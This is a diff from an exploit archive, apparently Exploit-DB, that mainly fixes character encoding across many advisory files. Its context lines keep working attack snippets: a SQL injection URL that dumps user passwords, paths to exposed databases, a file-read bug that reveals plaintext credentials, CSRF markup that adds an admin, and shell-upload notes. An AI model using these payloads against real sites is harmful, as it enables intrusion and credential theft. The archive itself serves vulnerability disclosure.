DB: 2015-04-20

11 new exploits

platforms/aix/dos/33943.txt

@@ -44,10 +44,10 @@ High
 Technical Details & Description:
 ========================
 1. Arbitrary File Read (Unauthenticated)
-It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.
+It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.
 
 2. Arbitrary Directory Listing (Authenticated)
-It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”. 
+It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”. 
 
 
 Proof of Concept (PoC):
@@ -105,9 +105,9 @@ X-Route-Time: 28
 X-Run-Time: 8090
 Content-Type: application/json
 
-{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
+{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
-………
+………
-{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
+{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
 
 
 Solution Fix & Patch:
@@ -120,7 +120,7 @@ The risk of the vulnerabilities above estimated as high and medium.
 
 Credits & Authors:
 ==============
-Bilgi Güvenliði Akademisi
+Bilgi Güvenliði Akademisi
 
 Disclaimer & Information:
 ===================
@@ -130,4 +130,4 @@ Domain:        http://bga.com.tr/advisories.html
 Social:           http://twitter.com/bgasecurity
 Contact:        bilgi@bga.com.tr
     
-Copyright © 2014 | BGA
+Copyright © 2014 | BGA

platforms/aix/dos/34588.txt

@@ -1,9 +1,9 @@
 # Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
 # Date : 9-9-2014
 # Author : jsass
-?# Vendor Homepage: ?http://www.posnic.com/?
+​# Vendor Homepage: ​http://www.posnic.com/​
-# Software Link:? http://sourceforge.net/projects/stockmanagement/
+# Software Link:​ http://sourceforge.net/projects/stockmanagement/
-# Version: ?1.02
+# Version: ​1.02
 # Tested on: kali linux
 # Twitter : @KwSecurity
 # Group : Q8 GRAY HAT TEAM

platforms/aix/dos/35342.txt

@@ -43,7 +43,7 @@ function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detectio
   global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
 
   // dans tous les cas :
-  echo "<p class='normal'><a class='erreur'> ";
+  echo "<p class='normal'><a class='erreur'> ";
   $msg = "";
 
   // test du nom

platforms/aix/remote/14456.c

@@ -9,7 +9,7 @@
  * ----------------------------------------------------------------------------
  * Description:                                                               -
  * The AIX 5l FTP-Server crashes when an overly long NLST command is supplied -
- * For example: NLST ~AAAAA...A (2000 A´s should be enough)                   -
+ * For example: NLST ~AAAAA...A (2000 A´s should be enough)                   -
  * The fun part here is that it creates a coredump file in the current        -
  * directory if it is set writable by the logged in user.                     -
  * The goal of the exploit is to get the DES encrypted user hashes            -

platforms/aix/webapps/11580.txt

@@ -1,16 +1,16 @@
 ==============================================================================
-        [»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
+        [»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
 ==============================================================================
-        [»] FileExecutive Multiple Vulnerabilities
+        [»] FileExecutive Multiple Vulnerabilities
 ==============================================================================
 
-    [»] Script:             [ FileExecutive v1.0.0 ]
+    [»] Script:             [ FileExecutive v1.0.0 ]
-    [»] Language:           [ PHP ]
+    [»] Language:           [ PHP ]
-    [»] Site page:          [ FileExecutive is a web-based file manager written in PHP. ]
+    [»] Site page:          [ FileExecutive is a web-based file manager written in PHP. ]
-    [»] Download:           [ http://sourceforge.net/projects/fileexecutive/ ]
+    [»] Download:           [ http://sourceforge.net/projects/fileexecutive/ ]
-    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
+    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
-    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
+    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
-    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
+    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
 
 ###########################################################################
 
@@ -54,23 +54,23 @@ Add/Edit Admin CSRF:
 <td><input type='checkbox' name='uload' value='1'>Upload</td>			<td><input type='checkbox' name='rename' value='1'>Rename</td>
 <td><input type='checkbox' name='delete' value='1'>Delete</td>		<td><input type='checkbox' name='edit' value='1'>Edit</td>
 <td><input type='checkbox' name='dload' value='1'>Download</td>		<td><input type='checkbox' name='chmod' value='1'>Chmod</td>
-<td><input type='checkbox' name='move' value='1'>Move</td>			<td> </td></tr>
+<td><input type='checkbox' name='move' value='1'>Move</td>			<td> </td></tr>
-<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
+<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
 </form>
 </body>
 </html>
 
 Shell Upload:
 
-    [»] By Go To The End Of Page & Browse Your Shell 2 upload it   <-=- Remote File Upload Vulnerability
+    [»] By Go To The End Of Page & Browse Your Shell 2 upload it   <-=- Remote File Upload Vulnerability
 
 Local File Disclosure:
 
-    [»] http://localhost/[path]/download.php?file=./LFD            <-=- Local File Disclosure Vulnerability
+    [»] http://localhost/[path]/download.php?file=./LFD            <-=- Local File Disclosure Vulnerability
 
 Full Path Disclosure:
 
-    [»] http://localhost/[path]/listdir.php?dir=./FPD              <-=- Full Path Disclosure Vulnerability
+    [»] http://localhost/[path]/listdir.php?dir=./FPD              <-=- Full Path Disclosure Vulnerability
 
 Author: ViRuSMaN <-
 

platforms/aix/webapps/14058.html

@@ -69,12 +69,12 @@ http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connecto
 
 </td>
 <td>
-   </td>
+   </td>
 <td>
 Current Folder<br />
 <input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
 <td>
-   </td>
+   </td>
 
 <td>
 Resource Type<br />
@@ -96,16 +96,16 @@ Resource Type<br />
 <td valign="top">
 <a href="#" onclick="GetFolders();">Get Folders</a></td>
 <td>
-   </td>
+   </td>
 <td valign="top">
 <a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
 <td>
-   </td>
+   </td>
 
 <td valign="top">
 <a href="#" onclick="CreateFolder();">Create Folder</a></td>
 <td>
-   </td>
+   </td>
 <td valign="top">
 <form id="frmUpload" action="" target="eRunningFrame" method="post"
 enctype="multipart/form-data">
@@ -138,7 +138,7 @@ height="100%"></iframe>
 
 [~] Special Thanks To My Best FriendS :
 
-NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
+NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
 ~~XTerror~~ , __l2o5v4__ , Zend
 
 [~] IRANIAN Young HackerZ

platforms/aix/webapps/21319.txt

@@ -8,7 +8,7 @@
 # CVE : CVE-2012-2995, CVE-2012-2996
 
 # Software Description
-# TrendMicro Interscan Messaging Security is the industry’s most comprehensive 
+# TrendMicro Interscan Messaging Security is the industry’s most comprehensive 
 # mail gateway security. Choose state-of-the-art software or a hybrid solution 
 # with on-premise virtual appliance and optional cloud pre-filter that blocks 
 # the vast majority of spam and malware outside your network. Plus our Data 

platforms/aix/webapps/33736.php

@@ -8,37 +8,37 @@
 
 /*
 
-????????????????????????????
+████████████████████████████
-?______¶¶¶¶¶¶______________?
+█______¶¶¶¶¶¶______________█
-?____¶¶¶¶¶¶¶¶¶¶____________?
+█____¶¶¶¶¶¶¶¶¶¶____________█
-?___¶¶¶¶¶¶¶¶¶¶¶¶¶__________?
+█___¶¶¶¶¶¶¶¶¶¶¶¶¶__________█
-?__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________?
+█__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________█
-?_¶¶¶¶¶¶¶______¶¶¶_________?
+█_¶¶¶¶¶¶¶______¶¶¶_________█
-?_¶¶¶¶¶¶________¶¶__¶¶_____?
+█_¶¶¶¶¶¶________¶¶__¶¶_____█
-?_¶¶¶¶¶¶____________¶¶¶____?
+█_¶¶¶¶¶¶____________¶¶¶____█
-?_¶¶¶¶¶_____________¶¶¶¶¶¶_?
+█_¶¶¶¶¶_____________¶¶¶¶¶¶_█
-?_¶¶¶¶¶____________¶¶¶¶¶¶¶_?
+█_¶¶¶¶¶____________¶¶¶¶¶¶¶_█
-?_¶¶¶¶¶___________¶¶¶¶¶¶¶__?
+█_¶¶¶¶¶___________¶¶¶¶¶¶¶__█
-?_¶¶¶¶¶____________¶¶¶¶¶¶__?
+█_¶¶¶¶¶____________¶¶¶¶¶¶__█
-?_¶¶¶¶¶_____________¶¶¶¶¶¶_?
+█_¶¶¶¶¶_____________¶¶¶¶¶¶_█
-?_¶¶¶¶¶¶____________¶¶¶_¶¶_?
+█_¶¶¶¶¶¶____________¶¶¶_¶¶_█
-?__¶¶¶¶¶¶______¶¶___¶¶_____?
+█__¶¶¶¶¶¶______¶¶___¶¶_____█
-?__¶¶¶¶¶¶¶____¶¶¶__________?
+█__¶¶¶¶¶¶¶____¶¶¶__________█
-?___¶¶¶¶¶¶¶¶¶¶¶¶___________?
+█___¶¶¶¶¶¶¶¶¶¶¶¶___________█
-?____¶¶¶¶¶¶¶¶¶¶____________?
+█____¶¶¶¶¶¶¶¶¶¶____________█
-?_____¶¶¶¶¶¶¶______________?
+█_____¶¶¶¶¶¶¶______________█
-????????????????????????????
+████████████████████████████
 
 Plesk SSO XXE injection (Old bug) Exploit
 Coded by z00 (electrocode)
 Twitter: electrocode
 
-Not: Tor kurulu de?ilse  proxy kismini kaldirin
+Not: Tor kurulu değilse  proxy kismini kaldirin
 
 Bug founded http://makthepla.net/blog/=/plesk-sso-xxe-xss
 
 
-Tüm ?slam Aleminin Beraat gecesi mubarek olsun dua edin:) 
+Tüm İslam Aleminin Beraat gecesi mubarek olsun dua edin:) 
 
 */
 function Gonder($domain,$komut,$method){

platforms/android/dos/35913.txt

@@ -227,7 +227,7 @@ Android 4.2.2.
 
 /-----
      I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00
-p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5  'fa¬¬'
+p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5  'fa¬¬'
 config_methods=0x188 dev_capab=0x21 group_capab=0x0
      E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS:
 WifiMonitor

platforms/android/remote/35637.py

@@ -104,4 +104,4 @@ def main(phone):
         password = base64.b64decode(password)
  
         # Custom message that will crash WhatsApp
-        message = message = "#RemoteExecution?
+        message = message = "#RemoteExecution

platforms/asp/webapps/10425.txt

@@ -31,6 +31,6 @@
 ##                        I Love You ****                          ##
 #####################################################################
 
-© aFiR.Me - 0nly F0r Security 2009 | By Mr.aFiR
+© aFiR.Me - 0nly F0r Security 2009 | By Mr.aFiR
 
 // Exploit End.

platforms/asp/webapps/10455.txt

@@ -1,25 +1,25 @@
 ===========================================================================
 ===
-[»] ~ Note : Hacker R0x Lamerz Sux !
+[»] ~ Note : Hacker R0x Lamerz Sux !
 ===========================================================================
 ===
-[»] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection
+[»] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection
 Vulnerability
 ===========================================================================
 ===
-[»] my home: [ Hackteach.org ]
+[»] my home: [ Hackteach.org ]
-[»] Script: [ DesigNsbyjm Cms 1.0 ]
+[»] Script: [ DesigNsbyjm Cms 1.0 ]
-[»] Language: [ PHP ]
+[»] Language: [ PHP ]
-[»] Home: [ http://designsbyjm.net/ ]
+[»] Home: [ http://designsbyjm.net/ ]
-[»] Founder: [ Red-D3v1L < No Email :d < ]
+[»] Founder: [ Red-D3v1L < No Email :d < ]
-[»] Gr44tz to: [ Hackteach Team - H1s0k4 - SkuLL-HaCkEr
+[»] Gr44tz to: [ Hackteach Team - H1s0k4 - SkuLL-HaCkEr
 - sec-r1z.com - 0d4y.com ]
-[»] Fuck to : [ Gaza 5acker << Big Big Big Lamerz ]
+[»] Fuck to : [ Gaza 5acker << Big Big Big Lamerz ]
 ########################################################################
 
 ===[ Exploit SQL ]=== 
 
-[»] [Path]/viewcontent.asp?pageid=[SQL]
+[»] [Path]/viewcontent.asp?pageid=[SQL]
 
 http://server/viewcontent.asp?pageid=-9+union+select+1,2,3,4,
 password,6,username,8,9,10,11,12,13+from+user

platforms/asp/webapps/10470.txt

@@ -20,10 +20,10 @@
  
 ===[ Exploit SQL Bypass ]=== 
  
- [»] Go to : [Path]/admin
+ [»] Go to : [Path]/admin
 
- [»] Add : siteConfig.asp
+ [»] Add : siteConfig.asp
 
- [»] dem0 :
+ [»] dem0 :
 
  http://server/admin/siteConfig.asp

platforms/asp/webapps/10482.txt

@@ -7,22 +7,22 @@
 
 
 ==============================================================================
-        [»] ~ Note : Thx 2 Egyptian National Team
+        [»] ~ Note : Thx 2 Egyptian National Team
 ==============================================================================
-        [»] Codefixer Membership Remote Database Disclosure Vulnerability
+        [»] Codefixer Membership Remote Database Disclosure Vulnerability
 ==============================================================================
 
-    [»] Script:             [ Codefixer Membership ]
+    [»] Script:             [ Codefixer Membership ]
-    [»] Language:           [ ASP ]
+    [»] Language:           [ ASP ]
-    [»] Site page:          [ ASP membership management script system ]
+    [»] Site page:          [ ASP membership management script system ]
-    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
+    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
-    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
+    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
-    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
+    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
 
 ###########################################################################
 
 ===[ Exploit ]===
 
-    [»] http://[target].com/[path]/members.mdb
+    [»] http://[target].com/[path]/members.mdb
 
 Author: ViRuSMaN <-

platforms/asp/webapps/10483.txt

@@ -7,24 +7,24 @@
 
 
 ==============================================================================
-        [»] ~ Note : Thx 2 Egyptian National Team
+        [»] ~ Note : Thx 2 Egyptian National Team
 ==============================================================================
-        [»] Free ASP GuestBookPro Script Remote Database Disclosure Vulnerability
+        [»] Free ASP GuestBookPro Script Remote Database Disclosure Vulnerability
 ==============================================================================
 
-    [»] Script:             [ GuestBookPro ]
+    [»] Script:             [ GuestBookPro ]
-    [»] Language:           [ ASP ]
+    [»] Language:           [ ASP ]
-    [»] Site page:          [ Codefixer GuestBookPro - Free ASP GuestBook Script ]
+    [»] Site page:          [ Codefixer GuestBookPro - Free ASP GuestBook Script ]
-    [»] Download:           [ http://www.codefixer.com/app_guestbookpro/default.asp ]
+    [»] Download:           [ http://www.codefixer.com/app_guestbookpro/default.asp ]
-    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
+    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
-    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
+    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
-    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
+    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
 
 ###########################################################################
 
 ===[ Exploit ]===
 
-    [»] http://[target].com/[path]/db/guestbook.mdb
+    [»] http://[target].com/[path]/db/guestbook.mdb
 
 
 Author: ViRuSMaN <-

platforms/asp/webapps/10558.txt

@@ -7,24 +7,24 @@
 
 
 ==============================================================================
-        [»] ~ Note : Thx 2 Egyptian National Team
+        [»] ~ Note : Thx 2 Egyptian National Team
 ==============================================================================
-        [»] Toast Forums v1.8 Database Disclosure Vulnerability
+        [»] Toast Forums v1.8 Database Disclosure Vulnerability
 ==============================================================================
 
-    [»] Script:             [ Toast Forums v1.8 ]
+    [»] Script:             [ Toast Forums v1.8 ]
-    [»] Language:           [ ASP ]
+    [»] Language:           [ ASP ]
-    [»] Site page:          [ Toast Forums World's first user-skinnable message board! ]
+    [»] Site page:          [ Toast Forums World's first user-skinnable message board! ]
-    [»] Download:           [ http://www.toastforums.com/download/ ]
+    [»] Download:           [ http://www.toastforums.com/download/ ]
-    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
+    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
-    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
+    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
-    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
+    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
 
 ###########################################################################
 
 ===[ Exploit ]===
 
-    [»] http://[target].com/[path]/data/data.mdb
+    [»] http://[target].com/[path]/data/data.mdb
 
 
 

platforms/asp/webapps/10576.txt

@@ -16,23 +16,23 @@
 
 ==============================================================================  
 
-        [»] ~ Note : Forever RevengeHack.Com 
+        [»] ~ Note : Forever RevengeHack.Com 
 
 ==============================================================================  
 
-        [»] Angelo-emlak v1.0  Database Disclosure Vulnerability  
+        [»] Angelo-emlak v1.0  Database Disclosure Vulnerability  
 
 ==============================================================================  
 
    
 
-    [»] Script:             [  angelo-emlak v1.0   ]  
+    [»] Script:             [  angelo-emlak v1.0   ]  
 
-    [»] Language:           [ ASP ]  
+    [»] Language:           [ ASP ]  
 
-    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com (Mail Gonderenin aq... :D ]  
+    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com (Mail Gonderenin aq... :D ]  
 
-    [»] My Home:            [ RevengeHack.com , Ar-ge.Org]  
+    [»] My Home:            [ RevengeHack.com , Ar-ge.Org]  
 
    
 
@@ -44,12 +44,12 @@
 
    
 
-    [»] http://[target].com/[path]/veribaze/angelo.mdb
+    [»] http://[target].com/[path]/veribaze/angelo.mdb
 
  
 
 
-   [»] ( c ) DesignAndCodeBy:Angelo
+   [»] ( c ) DesignAndCodeBy:Angelo
    
 
 
@@ -62,7 +62,7 @@ Thanks You: eXceptioN,CodeInside,CorDoN,Hack3ra,Rex aL0ne,By_HKC
 
                   Ve By_Magic :D 
 
-- Kaderimiz olan aþka deðil de aþkýyla kaderimizi deðiþtirene içelim!
+- Kaderimiz olan aþka deðil de aþkýyla kaderimizi deðiþtirene içelim!
 
                                  
 

platforms/asp/webapps/10637.txt

@@ -7,24 +7,24 @@
 
 
 ==============================================================================
-        [»] ~ Note : Some sites may change the path of the "database/NewsPad.mdb" cause the vulnerability not work
+        [»] ~ Note : Some sites may change the path of the "database/NewsPad.mdb" cause the vulnerability not work
 ==============================================================================
-        [»] Web Wiz NewsPad Remote Database Disclosure Vulnerability
+        [»] Web Wiz NewsPad Remote Database Disclosure Vulnerability
 ==============================================================================
 
-    [»] Script:             [ Web Wiz NewsPad ]
+    [»] Script:             [ Web Wiz NewsPad ]
-    [»] Language:           [ ASP ]
+    [»] Language:           [ ASP ]
-    [»] Site page:          [ Web Wiz NewsPad - Free eNewsletter Software Download ]
+    [»] Site page:          [ Web Wiz NewsPad - Free eNewsletter Software Download ]
-    [»] Download:           [ http://www.webwizguide.com/webwiznewspad/downloads.asp ]
+    [»] Download:           [ http://www.webwizguide.com/webwiznewspad/downloads.asp ]
-    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
+    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
-    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com  ]
+    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com  ]
-    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
+    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
 
 ###########################################################################
 
 ===[ Exploit ]===
 
-    [»] http://[target].com/[path]/database/NewsPad.mdb
+    [»] http://[target].com/[path]/database/NewsPad.mdb
 
 Author: ViRuSMaN <-
 

platforms/asp/webapps/10638.txt

@@ -7,25 +7,25 @@
 
 
 ==============================================================================
-        [»] ~ Note : Some forums may change the path of the "database/wwForum.mdb" cause the vulnerability not work
+        [»] ~ Note : Some forums may change the path of the "database/wwForum.mdb" cause the vulnerability not work
 ==============================================================================
-        [»] Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability
+        [»] Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability
 ==============================================================================
 
-    [»] Script:             [ Web Wiz Forums v9.64 ]
+    [»] Script:             [ Web Wiz Forums v9.64 ]
-    [»] Language:           [ ASP ]
+    [»] Language:           [ ASP ]
-    [»] Site page:          [ Web Wiz Forums - Free Forum Software - Free Bulletin Board Software ]
+    [»] Site page:          [ Web Wiz Forums - Free Forum Software - Free Bulletin Board Software ]
-    [»] Download:           [ http://www.webwizguide.com/webwizforums/webwizforums_downloads.asp ]
+    [»] Download:           [ http://www.webwizguide.com/webwizforums/webwizforums_downloads.asp ]
-    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
+    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
-    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com  ]
+    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com  ]
-    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
+    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
-    [»] Dork:               [ Web Wiz Forums® version 9.64 [Free Express Edition] ]
+    [»] Dork:               [ Web Wiz Forums® version 9.64 [Free Express Edition] ]
 
 ###########################################################################
 
 ===[ Exploit ]===
 
-    [»] http://[target].com/[path]/database/wwForum.mdb
+    [»] http://[target].com/[path]/database/wwForum.mdb
 
 Author: ViRuSMaN <-
 

platforms/asp/webapps/10639.txt

@@ -7,24 +7,24 @@
 
 
 ==============================================================================
-        [»] ~ Note : if the path of  "snitz_forums_2000.mdb" has been changed this exploit will not work
+        [»] ~ Note : if the path of  "snitz_forums_2000.mdb" has been changed this exploit will not work
 ==============================================================================
-        [»] Snitz Forums 2000 Remote Database Disclosure Vulnerability
+        [»] Snitz Forums 2000 Remote Database Disclosure Vulnerability
 ==============================================================================
 
-    [»] Script:             [ Snitz Forums ]
+    [»] Script:             [ Snitz Forums ]
-    [»] Language:           [ ASP ]
+    [»] Language:           [ ASP ]
-    [»] Site page:          [ Snitz Forums 2000 - free ASP-based Internet Discussion Forum Software ]
+    [»] Site page:          [ Snitz Forums 2000 - free ASP-based Internet Discussion Forum Software ]
-    [»] Download:           [ http://forum.snitz.com/specs.asp ]
+    [»] Download:           [ http://forum.snitz.com/specs.asp ]
-    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
+    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
-    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com  ]
+    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com  ]
-    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
+    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
 
 ###########################################################################
 
 ===[ Exploit ]===
 
-    [»] http://[target].com/[path]/snitz_forums_2000.mdb
+    [»] http://[target].com/[path]/snitz_forums_2000.mdb
 
 Author: ViRuSMaN <-
 

platforms/asp/webapps/10767.txt

@@ -5,7 +5,7 @@
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
 | # Web Site : www.iq-ty.com                                                           |
 | # Script   : jgbbs-3.0  beta 1                                                       |
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
 | # Bug      : DB                                                                      | 
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/10770.txt

@@ -5,7 +5,7 @@
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
 | # Web Site : www.iq-ty.com                                                           |
 | # Script   : PSnews - Copyright (C) 2003 Rich Kavanagh                               |
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
 | # Bug      : DB                                                                      | 
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/10771.txt

@@ -4,7 +4,7 @@
 | # email    : indoushka@hotmail.com                                                   |
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
 | # Web Site : www.iq-ty.com                                                           |
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
 | # Bug      : SQL Injection                                                            | 
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/10772.txt

@@ -5,7 +5,7 @@
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
 | # Web Site : www.iq-ty.com                                                           |
 | # Script   : [ AspBB ] - Active Server Page Bulletin Board                           |
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
 | # Bug      : DB                                                                      | 
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/10773.txt

@@ -5,7 +5,7 @@
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
 | # Web Site : www.iq-ty.com                                                           |
 | # Script   : Futility Forum 1.0 Revamp                                               |
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
 | # Bug      : DB                                                                      | 
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/10774.txt

@@ -5,7 +5,7 @@
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
 | # Web Site : www.iq-ty.com                                                           |
 | # Script   : htmlArea v2.03                                                          |
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
 | # Bug      : DB                                                                      | 
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/10775.txt

@@ -5,7 +5,7 @@
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
 | # Web Site : www.iq-ty.com                                                           |
 | # Script   : Uguestbook !talian script                                               |
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
 | # Bug      : DB                                                                      | 
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/10776.txt

@@ -5,7 +5,7 @@
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
 | # Web Site : www.iq-ty.com                                                           |
 | # Script   : BaalASP 2.0                                                             |
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
 | # Bug      : DB                                                                      | 
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/10777.txt

@@ -5,7 +5,7 @@
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
 | # Web Site : www.iq-ty.com                                                           |
 | # Script   : FULLY FUNCTIONAL ASP FORUM - MtMWebForum 1.0                            |
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
